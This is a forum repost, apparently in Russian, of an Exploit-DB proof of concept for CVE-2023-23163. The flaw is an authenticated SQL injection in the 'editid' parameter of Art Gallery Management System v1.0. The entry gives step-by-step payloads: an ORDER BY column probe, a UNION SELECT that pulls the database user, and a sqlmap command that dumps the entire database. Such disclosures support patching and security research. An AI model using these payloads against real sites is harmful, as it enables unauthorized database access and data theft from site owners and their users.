Exploit Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated

  • Автор темы Exploiter
  • Дата начала
  • Просмотров 2460 Просмотров

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
51216
Проверка EDB
  1. Пройдено
Автор
RAHUL PATWARI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2023-23163
Дата публикации
2023-04-03
Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated
Код:
# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on:  XAMPP / Windows 10
# CVE :  CVE-2023-23163

# Proof of Concept:

# 1- Install The application Art Gallery Management System Project v1.0

# 2- Navigate to admin login page and login with the valid username and password<admin:Test@123>.
  URL: http://localhost/Art-Gallery-MS-PHP/admin/login.php

# 3- Now navigate "Manage ART TYPE" by clicking on "ART TYPE" option on left side bar.

# 4- Now click on any of the Art Type "Edit" button and you will redirect to the edit page of art type.

# 5- Now insert a single quote ( ' ) on "editid" parameter to break the database query, you will see the output is not shows.

# 6- Now inject the payload double single quote ('') in the "editid" parameter to merge the database query and after sending this request the SQL query is successfully performed and product is shows in the output.

# 7- Now find how many column are returns by the SQL query. this query will return 6 column.
  Payload:editid=6%27order%20by%203%20--%20-

# 8- For manually get data of database insert the below payload to see the user of the database.
  payload: editid=-6%27union%20all%20select%201,user(),3--%20-

# 9- Now to get all database data use below "sqlmap" command to fetch all the data.
 Command: sqlmap http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=6 --cookie="PHPSESSID=hub8pub9s5c1j18cva9594af3q" --dump-all --batch
 
Источник
www.exploit-db.com

Похожие темы